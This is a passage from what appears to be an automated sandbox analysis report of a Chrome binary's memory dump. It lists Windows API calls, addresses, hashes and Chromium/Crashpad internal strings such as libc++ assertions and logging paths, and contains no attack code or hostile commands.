                                                    • ..\..\third_party\libc++\src\include\string_view:318: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type, xrefs: 00D3365A
                                                    • d, xrefs: 00D335D3
                                                    • ..\..\third_party\libc++\src\include\string_view:268: assertion __s != nullptr failed: null pointer passed to non-null argument of char_traits<...>::length, xrefs: 00D3367C
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    Similarity
                                                    • API ID: _strlen$Unothrow_t@std@@@__ehfuncinfo$??2@
                                                    • String ID: ..\..\third_party\libc++\src\include\string_view:268: assertion __s != nullptr failed: null pointer passed to non-null argument of char_traits<...>::length$..\..\third_party\libc++\src\include\string_view:318: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type$..\..\third_party\libc++\src\include\string_view:320: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr$Other$d
                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,fallback-handler,00000010,?,?), ref: 00D45299
                                                    • GetProcAddress.KERNEL32(00000000,SetUnhandledExceptionFilter), ref: 00D452A9
                                                    Strings
                                                    • SetUnhandledExceptionFilter, xrefs: 00D452A3
                                                    • ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at, xrefs: 00D4510F
                                                    • type, xrefs: 00D451E4
                                                    • test-child-process, xrefs: 00D451F0
                                                    • ..\..\third_party\libc++\src\include\__string\char_traits.h:222: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap, xrefs: 00D45108
                                                    • kernel32.dll, xrefs: 00D45294
                                                    • database, xrefs: 00D45231
                                                    • fallback-handler, xrefs: 00D451DD
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    Similarity
                                                    • API ID: AddressHandleModuleProc
                                                    • String ID: ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at$..\..\third_party\libc++\src\include\__string\char_traits.h:222: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap$SetUnhandledExceptionFilter$database$fallback-handler$kernel32.dll$test-child-process$type
                                                    APIs
                                                    • _strlen.LIBCMT ref: 00DB75FF
                                                    • TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,7FFFFFF7,?,7FFFFFF7,?,00DF1938,Histogram.MismatchedConstructionArguments,00000000,00ED1384,..\..\third_party\libc++\src\include\string_view:268: assertion __s != nullptr failed: null pointer passed to non-null argument of char_traits<...>::length), ref: 00DB773F
                                                    • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,7FFFFFF7,?,7FFFFFF7,?,00DF1938,Histogram.MismatchedConstructionArguments,00000000,00ED1384,..\..\third_party\libc++\src\include\string_view:268: assertion __s != nullptr failed: null pointer passed to non-null argument of char_traits<...>::length), ref: 00DB7762
                                                    • AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,7FFFFFF7,?,7FFFFFF7,?,00DF1938,Histogram.MismatchedConstructionArguments,00000000,00ED1384,..\..\third_party\libc++\src\include\string_view:268: assertion __s != nullptr failed: null pointer passed to non-null argument of char_traits<...>::length), ref: 00DB7855
                                                    • ReleaseSRWLockExclusive.KERNEL32(7FFFFFF7,?,7FFFFFF7,?,7FFFFFF7,?,00DF1938,Histogram.MismatchedConstructionArguments,00000000,00ED1384,..\..\third_party\libc++\src\include\string_view:268: assertion __s != nullptr failed: null pointer passed to non-null argument of char_traits<...>::length), ref: 00DB78D4
                                                    Strings
                                                    • T, xrefs: 00DB787B
                                                    • ..\..\third_party\libc++\src\include\string_view:320: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr, xrefs: 00DB78A0
                                                    • ..\..\third_party\libc++\src\include\string:973: assertion __s != nullptr failed: basic_string(const char*) detected nullptr, xrefs: 00DB7892
                                                    • ..\..\third_party\libc++\src\include\__string\char_traits.h:145: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap, xrefs: 00DB788B
                                                    • ..\..\third_party\libc++\src\include\string_view:318: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type, xrefs: 00DB7899
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    Similarity
                                                    • API ID: ExclusiveLock$AcquireRelease$_strlen
                                                    • String ID: ..\..\third_party\libc++\src\include\__string\char_traits.h:145: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap$..\..\third_party\libc++\src\include\string:973: assertion __s != nullptr failed: basic_string(const char*) detected nullptr$..\..\third_party\libc++\src\include\string_view:318: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type$..\..\third_party\libc++\src\include\string_view:320: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr$T
                                                    APIs
                                                    • UnregisterWaitEx.KERNEL32(?,-00000001,?,?,?,?,?,00D48DC9), ref: 00D491D1
                                                    • UnregisterWaitEx.KERNEL32(?,-00000001,?,?,?,?,?,00D48DC9), ref: 00D491D9
                                                    • UnregisterWaitEx.KERNEL32(?,-00000001,?,?,?,?,?,00D48DC9), ref: 00D491E2
                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,00D48DC9), ref: 00D49200
                                                    • CloseHandle.KERNEL32(?,CloseHandle,?,?,?,?,?,?,?,?,?,?,?,00D48DC9), ref: 00D4922E
                                                    • CloseHandle.KERNEL32(?,CloseHandle,?,?,?,?,?,?,?,?,?,?,?,00D48DC9), ref: 00D49258
                                                    • CloseHandle.KERNEL32(?,CloseHandle,?,?,?,?,?,?,?,?,?,?,?,00D48DC9), ref: 00D49282
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    Similarity
                                                    • API ID: CloseHandle$UnregisterWait
                                                    • String ID: ..\..\third_party\crashpad\crashpad\util\win\scoped_handle.cc$CloseHandle$Free
                                                    APIs
                                                    • VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?), ref: 00D74F82
                                                    • GetUserDefaultLangID.KERNEL32(00000000,\VarFileInfo\Translation,?,?), ref: 00D74FAE
                                                    • GetUserDefaultLangID.KERNEL32 ref: 00D74FB7
                                                    • VerQueryValueW.VERSION(?,?,?,?), ref: 00D75023
                                                    • VerQueryValueW.VERSION(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00D750A2
                                                    • VerQueryValueW.VERSION(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00D7511E
                                                    • VerQueryValueW.VERSION(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00D75199
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    Similarity
                                                    • API ID: QueryValue$DefaultLangUser
                                                    • String ID: \StringFileInfo\%04hx%04hx\%ls$\VarFileInfo\Translation
                                                    APIs
                                                    • GetLastError.KERNEL32 ref: 00D74007
                                                    • DisconnectNamedPipe.KERNEL32(?), ref: 00D7401C
                                                    • ConnectNamedPipe.KERNEL32(?,00000000), ref: 00D74023
                                                    • CloseHandle.KERNEL32(?), ref: 00D7404D
                                                    Strings
                                                    • ..\..\third_party\crashpad\crashpad\util\win\exception_handler_server.cc, xrefs: 00D740DE
                                                    • Free, xrefs: 00D74089
                                                    • CloseHandle, xrefs: 00D740A6
                                                    • ConnectNamedPipe, xrefs: 00D740EA
                                                    • ..\..\third_party\crashpad\crashpad\util\win\scoped_handle.cc, xrefs: 00D74084
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    Similarity
                                                    • API ID: NamedPipe$CloseConnectDisconnectErrorHandleLast
                                                    • String ID: ..\..\third_party\crashpad\crashpad\util\win\exception_handler_server.cc$..\..\third_party\crashpad\crashpad\util\win\scoped_handle.cc$CloseHandle$ConnectNamedPipe$Free
                                                    APIs
                                                    • GetFileAttributesW.KERNEL32(00000000,?), ref: 00D82683
                                                    • GetLastError.KERNEL32 ref: 00D8268E
                                                    • DeleteFileW.KERNEL32(00000000), ref: 00D826D7
                                                    • RemoveDirectoryW.KERNEL32(00000000), ref: 00D826E4
                                                    • SetLastError.KERNEL32(000000A1), ref: 00D8270C
                                                    • SetFileAttributesW.KERNEL32(00000000,00000000), ref: 00D827B6
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: File$AttributesErrorLast$DeleteDirectoryRemove
                                                    • String ID: ..\..\base\files\file_util_win.cc$DoDeleteFile$ScopedBlockingCall
                                                    APIs
                                                    • TryAcquireSRWLockExclusive.KERNEL32(FFFFFFFF,?,00D3BCE8,?,?,?,?,?,?,?,?), ref: 00D402A5
                                                    • WakeAllConditionVariable.KERNEL32(?,?,00D3BCE8,?,?,?,?,?,?,?,?), ref: 00D402B7
                                                    • ReleaseSRWLockExclusive.KERNEL32(FFFFFFFF,?,00D3BCE8,?,?,?,?,?,?,?,?), ref: 00D402BE
                                                    • TryAcquireSRWLockExclusive.KERNEL32(FFFFFFFF,?,00D3BCE8,?,?,?,?,?,?,?,?), ref: 00D402C5
                                                    • ReleaseSRWLockExclusive.KERNEL32(FFFFFFFF,?,00D3BCE8,?,?,?,?,?,?,?,?), ref: 00D402EF
                                                    • TryAcquireSRWLockExclusive.KERNEL32(?,?,00D3BCE8,?,?,?,?,?,?,?,?), ref: 00D40336
                                                    • ReleaseSRWLockExclusive.KERNEL32(?,?,00D3BCE8,?,?,?,?,?,?,?,?), ref: 00D4034D
                                                    • AcquireSRWLockExclusive.KERNEL32(FFFFFFFF,?,00D3BCE8,?,?,?,?,?,?,?,?), ref: 00D40359
                                                    • AcquireSRWLockExclusive.KERNEL32(FFFFFFFF,?,00D3BCE8,?,?,?,?,?,?,?,?), ref: 00D40365
                                                    • AcquireSRWLockExclusive.KERNEL32(?,?,00D3BCE8,?,?,?,?,?,?,?,?), ref: 00D40421
                                                    Similarity
                                                    • API ID: ExclusiveLock$Acquire$Release$ConditionVariableWake
                                                    • String ID:
                                                    APIs
                                                    Strings
                                                    Similarity
                                                    • API ID: _strrchr
                                                    • String ID: j0Yj
                                                    APIs
                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 00D32F97
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00D32FDA
                                                    • GetCurrentThreadId.KERNEL32 ref: 00D330E8
                                                    • GetCurrentThreadId.KERNEL32 ref: 00D330F7
                                                    • GetCurrentThreadId.KERNEL32 ref: 00D33104
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00D33133
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00D331A4
                                                    Strings
                                                    • ..\..\third_party\libc++\src\include\__memory\construct_at.h:66: assertion __loc != nullptr failed: null pointer given to destroy_at, xrefs: 00D32F1A
                                                    Similarity
                                                    • API ID: CurrentThreadUnothrow_t@std@@@__ehfuncinfo$??2@$CounterPerformanceQuery
                                                    • String ID: ..\..\third_party\libc++\src\include\__memory\construct_at.h:66: assertion __loc != nullptr failed: null pointer given to destroy_at
                                                    APIs
                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,?,00D46E87,?), ref: 00D487CF
                                                    • DeleteFileW.KERNEL32(00000000,00D46E8B), ref: 00D48868
                                                    Strings
                                                    Similarity
                                                    • API ID: CloseDeleteFileHandle
                                                    • String ID: !settings.log_file_path.empty()$..\..\base\logging.cc$BaseInitLoggingImpl_built_with_NDEBUG$LOG_TO_FILE set but no log_file_path!$settings.log_file_path.empty()$vmodule
                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00DA83E2
                                                    • GetProcAddress.KERNEL32(00000000,GetHandleVerifier), ref: 00DA83EE
                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00DA8425
                                                    • GetProcAddress.KERNEL32(00000000,GetHandleVerifier), ref: 00DA8431
                                                    Strings
                                                    Similarity
                                                    • API ID: AddressHandleModuleProc
                                                    • String ID: ..\..\base\files\file_win.cc$Close$GetHandleVerifier$ScopedBlockingCall
                                                    APIs
                                                    • CreateEventW.KERNEL32 ref: 00D4852C
                                                    • CreateEventW.KERNEL32 ref: 00D48580
                                                    • CreateThread.KERNEL32(00000000,00000000,00D9BD20,00000000,00000000,00000000), ref: 00D485C9
                                                    Strings
                                                    Similarity
                                                    • API ID: Create$Event$Thread
                                                    • String ID: ..\..\third_party\crashpad\crashpad\util\thread\thread_win.cc$..\..\third_party\crashpad\crashpad\util\win\session_end_watcher.cc$CreateEvent$CreateThread$Start
                                                    APIs
                                                    • GetCurrentThread.KERNEL32 ref: 00D50C0B
                                                    • LocalFree.KERNEL32(?), ref: 00D50CD0
                                                    • GetModuleHandleA.KERNEL32(Kernel32.dll), ref: 00D50D0E
                                                    • GetProcAddress.KERNEL32(00000000,GetThreadDescription), ref: 00D50D1A
                                                      • Part of subcall function 00E57A70: _strlen.LIBCMT ref: 00E57B89
                                                    Strings
                                                    • Kernel32.dll, xrefs: 00D50D09
                                                    • ..\..\third_party\libc++\src\include\string:973: assertion __s != nullptr failed: basic_string(const char*) detected nullptr, xrefs: 00D50D40
                                                    • ..\..\third_party\libc++\src\include\__string\char_traits.h:222: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap, xrefs: 00D50D47
                                                    • GetThreadDescription, xrefs: 00D50D14
                                                    Similarity
                                                    • API ID: AddressCurrentFreeHandleLocalModuleProcThread_strlen
                                                    • String ID: ..\..\third_party\libc++\src\include\__string\char_traits.h:222: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap$..\..\third_party\libc++\src\include\string:973: assertion __s != nullptr failed: basic_string(const char*) detected nullptr$GetThreadDescription$Kernel32.dll
                                                    APIs
                                                    • Sleep.KERNEL32(00000000,?,000F4240), ref: 00DF333B
                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 00DF3364
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00DF33A7
                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00DF342F
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00DF346F
                                                    Similarity
                                                    • API ID: CounterPerformanceQueryUnothrow_t@std@@@__ehfuncinfo$??2@$Sleep
                                                    • String ID:
                                                    APIs
                                                    • GetCurrentProcess.KERNEL32(crashpad-handler,?,?,?,?,?,?,?,?,?,?,?,00E579B4), ref: 00E6E542
                                                    • TerminateProcess.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00E579B4), ref: 00E6E54A
                                                    • GetCurrentProcess.KERNEL32 ref: 00E6E566
                                                    • WaitForSingleObject.KERNEL32(00000000,0000EA60), ref: 00E6E572
                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00E579B4), ref: 00E6E58E
                                                    • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,00E579B4), ref: 00E6E59E
                                                    • WaitForSingleObject.KERNEL32(00000000,0000EA60,?,?,?,?,?,?,?,?,?,?,00E579B4), ref: 00E6E5AA
                                                    • GetCurrentProcess.KERNEL32 ref: 00E6E5C9
                                                    • GetExitCodeProcess.KERNEL32(00000000,FFFFFFFF), ref: 00E6E5D4
                                                    Similarity
                                                    • API ID: Process$Current$ObjectSingleWait$CodeErrorExitLastTerminate
                                                    • String ID:
                                                    • API String ID: 2432511979-0
                                                    • Opcode ID: 20ffabaf84c2e0fe6e3e2b3f271b4873d57b66dc606f8ef366c83e1ef1ada008
                                                    • Instruction ID: ffc3938b57b67ed3befab7874bcf355489a7706145c600d323a191b068b1221d
                                                    • Opcode Fuzzy Hash: 20ffabaf84c2e0fe6e3e2b3f271b4873d57b66dc606f8ef366c83e1ef1ada008
                                                    • Instruction Fuzzy Hash: 942199746442899FD7209B65F88C6AA7BA4FB05358F1C542DF443BB3D0E774E848C752
                                                    APIs
                                                    • RegisterWaitForSingleObject.KERNEL32(00000000,?,00E894F0,00000000,000000FF,00000000), ref: 00D74990
                                                    • RegisterWaitForSingleObject.KERNEL32(00000000,?,?,00000000,000000FF,00000000), ref: 00D749B6
                                                    • RegisterWaitForSingleObject.KERNEL32(?,?,00000008,00000000,000000FF,00000008), ref: 00D749D8
                                                      • Part of subcall function 00D9BC60: CloseHandle.KERNEL32(00D485FC,?,00000000,00000000,?,00D485FC,00000000), ref: 00D9BC77
                                                    Strings
                                                    • RegisterWaitForSingleObject process end, xrefs: 00D74B69
                                                    • ..\..\third_party\crashpad\crashpad\util\win\exception_handler_server.cc, xrefs: 00D74AB9, 00D74B0A, 00D74B57
                                                    • RegisterWaitForSingleObject crash dump requested, xrefs: 00D74ACB
                                                    • RegisterWaitForSingleObject non-crash dump requested, xrefs: 00D74B1C
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: ObjectRegisterSingleWait$CloseHandle
                                                    • String ID: ..\..\third_party\crashpad\crashpad\util\win\exception_handler_server.cc$RegisterWaitForSingleObject crash dump requested$RegisterWaitForSingleObject non-crash dump requested$RegisterWaitForSingleObject process end
                                                    • API String ID: 2574254514-2013388152
                                                    • Opcode ID: 2407e8a19088ef5ef8b16c660bfc14fbdc6c6c64a729187a9187fdb42520afcb
                                                    • Instruction ID: 38421943b2056f4a96320ddce3f6ace9ae92ae90de55ec6d3de266ec70a9548f
                                                    • Opcode Fuzzy Hash: 2407e8a19088ef5ef8b16c660bfc14fbdc6c6c64a729187a9187fdb42520afcb
                                                    • Instruction Fuzzy Hash: ED7124B0A40B05AFDB21CF25D945F52B7F4BF48304F04922DE54DA7692E770E998CBA1
                                                    APIs
                                                    • TryAcquireSRWLockExclusive.KERNEL32(?), ref: 00D536D6
                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 00D537C6
                                                    • AcquireSRWLockExclusive.KERNEL32(?), ref: 00D53870
                                                    Strings
                                                    • id_to_handle_iter != thread_id_to_handle_.end(), xrefs: 00D53853
                                                    • handle_to_name_iter != thread_handle_to_interned_name_.end(), xrefs: 00D53813
                                                    • RemoveName, xrefs: 00D537FC, 00D5383C
                                                    • ..\..\base\threading\thread_id_name_manager.cc, xrefs: 00D537F7, 00D53837
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: ExclusiveLock$Acquire$Release
                                                    • String ID: ..\..\base\threading\thread_id_name_manager.cc$RemoveName$handle_to_name_iter != thread_handle_to_interned_name_.end()$id_to_handle_iter != thread_id_to_handle_.end()
                                                    • API String ID: 1678258262-1713423127
                                                    • Opcode ID: d099cd818c8ee58e4b1ae633126f16a8e2e710cbed853f993fab9a24aa60a0c6
                                                    • Instruction ID: 8c86dbebcf705e480695fd576ffcd2923435846b8e0eaa742295687ef28ef56d
                                                    • Opcode Fuzzy Hash: d099cd818c8ee58e4b1ae633126f16a8e2e710cbed853f993fab9a24aa60a0c6
                                                    • Instruction Fuzzy Hash: 7051B6B1B002059BCF249E25D85197A73F6FF98786758052DFC06A7641EB31EE09C7B1
                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,00E2916B,00E2933A,00E293A2), ref: 00E29107
                                                    • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00E2911D
                                                    • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00E29132
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: AddressProc$HandleModule
                                                    • String ID: ,($AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                    • API String ID: 667068680-1950051831
                                                    • Opcode ID: 090d94ca38e771914d8f94a2de80227e5a7b9e71267be59c2e52086bdcfa9df4
                                                    • Instruction ID: de14d29a1533fbc571cf4658263a9dcf152528ca723c98a686caa1551b1004f6
                                                    • Opcode Fuzzy Hash: 090d94ca38e771914d8f94a2de80227e5a7b9e71267be59c2e52086bdcfa9df4
                                                    • Instruction Fuzzy Hash: ABF08C31B432739B4F210E636DCAAB623C85A46798B0B703DE601F7242D710CC1A96D1
                                                    APIs
                                                    • GetLastError.KERNEL32(?,?,?), ref: 00E7350B
                                                      • Part of subcall function 00D82B00: GetCurrentDirectoryW.KERNEL32(00000104,?,?,00000000,00000000), ref: 00D82B92
                                                    • GetStartupInfoW.KERNEL32(?,00000000), ref: 00E732DD
                                                    Strings
                                                    • source-shortcut, xrefs: 00E73307
                                                    • ..\..\third_party\libc++\src\include\string_view:320: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr, xrefs: 00E735A8
                                                    • ..\..\third_party\libc++\src\include\string_view:318: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type, xrefs: 00E735AF
                                                    • ..\..\third_party\libc++\src\include\string_view:268: assertion __s != nullptr failed: null pointer passed to non-null argument of char_traits<...>::length, xrefs: 00E735A1
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: CurrentDirectoryErrorInfoLastStartup
                                                    • String ID: ..\..\third_party\libc++\src\include\string_view:268: assertion __s != nullptr failed: null pointer passed to non-null argument of char_traits<...>::length$..\..\third_party\libc++\src\include\string_view:318: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type$..\..\third_party\libc++\src\include\string_view:320: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr$source-shortcut
                                                    • API String ID: 783172407-2813202532
                                                    • Opcode ID: 55e6ae087500383c5339a847f13a3b9b2e810a615abb7772261e662e54f567d7
                                                    • Instruction ID: 06550135db0506717416ca1619d5edd6923915d15bbd39b96d5e93390c8375b0
                                                    • Opcode Fuzzy Hash: 55e6ae087500383c5339a847f13a3b9b2e810a615abb7772261e662e54f567d7
                                                    • Instruction Fuzzy Hash: 02D1DEB0D01314AAEB218F61DC45BEEBBB4EB45704F10A199E4487B282E7755B09DFA1
                                                    APIs
                                                    • GetFileInformationByHandleEx.KERNEL32(?,00000002,00000000,00000210), ref: 00D48975
                                                    • TryAcquireSRWLockExclusive.KERNEL32(00000188,00000000,\\.\pipe,00000008,00000004,00000000), ref: 00D489FF
                                                      • Part of subcall function 00D77C00: CloseHandle.KERNEL32(00D483A6), ref: 00D77C1A
                                                      • Part of subcall function 00D748E0: RegisterWaitForSingleObject.KERNEL32(00000000,?,00E894F0,00000000,000000FF,00000000), ref: 00D74990
                                                      • Part of subcall function 00D748E0: RegisterWaitForSingleObject.KERNEL32(00000000,?,?,00000000,000000FF,00000000), ref: 00D749B6
                                                      • Part of subcall function 00D748E0: RegisterWaitForSingleObject.KERNEL32(?,?,00000008,00000000,000000FF,00000008), ref: 00D749D8
                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 00D48B36
                                                    Strings
                                                    • \\.\pipe, xrefs: 00D489A5
                                                    • ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at, xrefs: 00D48B97
                                                    • GetFileInformationByHandleEx, xrefs: 00D48BE5
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: ObjectRegisterSingleWait$ExclusiveHandleLock$AcquireCloseFileInformationRelease
                                                    • String ID: ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at$GetFileInformationByHandleEx$\\.\pipe
                                                    • API String ID: 1841929329-4152786217
                                                    • Opcode ID: 66db34c8c07ecdb15160a999ba6e9c79bc3891045d0af1ef0a1de104fc2d7fac
                                                    • Instruction ID: 8eb4e3d43dc6f608d43de0042152e8cb78412dfa039bb8b682507e5053c5617b
                                                    • Opcode Fuzzy Hash: 66db34c8c07ecdb15160a999ba6e9c79bc3891045d0af1ef0a1de104fc2d7fac
                                                    • Instruction Fuzzy Hash: A89171B4A003158FDB14DF28D881A59B7F5FF08340F1886AAE849A7352DB30ED85CFA1
                                                    APIs
                                                    Strings
                                                    • pc:%p, xrefs: 00D8450C
                                                    • ..\..\third_party\libc++\src\include\string:973: assertion __s != nullptr failed: basic_string(const char*) detected nullptr, xrefs: 00D844A0
                                                    • ..\..\third_party\libc++\src\include\__string\char_traits.h:145: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap, xrefs: 00D844A7
                                                    • ..\..\third_party\libc++\src\include\string:2862: assertion __s != nullptr failed: string::append received nullptr, xrefs: 00D844AE
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: _strlen
                                                    • String ID: ..\..\third_party\libc++\src\include\__string\char_traits.h:145: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap$..\..\third_party\libc++\src\include\string:2862: assertion __s != nullptr failed: string::append received nullptr$..\..\third_party\libc++\src\include\string:973: assertion __s != nullptr failed: basic_string(const char*) detected nullptr$pc:%p
                                                    • API String ID: 4218353326-891714225
                                                    • Opcode ID: 76e008fbcda5dd3b0f31d07430d1b046371b51d1b94e51c142e06b44f070a605
                                                    • Instruction ID: 7278bf3778f1b90948a78855890f4c1dfca0d9a09eecf8a12292a640fafe4cc0
                                                    • Opcode Fuzzy Hash: 76e008fbcda5dd3b0f31d07430d1b046371b51d1b94e51c142e06b44f070a605
                                                    • Instruction Fuzzy Hash: AC6119B1C0071A9FCB01EF64D841BAEB7B5EF96304F19C256F4053B261E7B0A985C7A1
                                                    APIs
                                                    • TryAcquireSRWLockExclusive.KERNEL32(00F03488), ref: 00D34F2A
                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 00D34FBC
                                                    • TryAcquireSRWLockExclusive.KERNEL32(00F0348C), ref: 00D350BD
                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 00D350DB
                                                    Strings
                                                    • ..\..\third_party\libc++\src\include\array:239: assertion __n < _Size failed: out-of-bounds access in std::array<T, N>, xrefs: 00D3507E
                                                    • 2, xrefs: 00D35013
                                                    Memory Dump Source
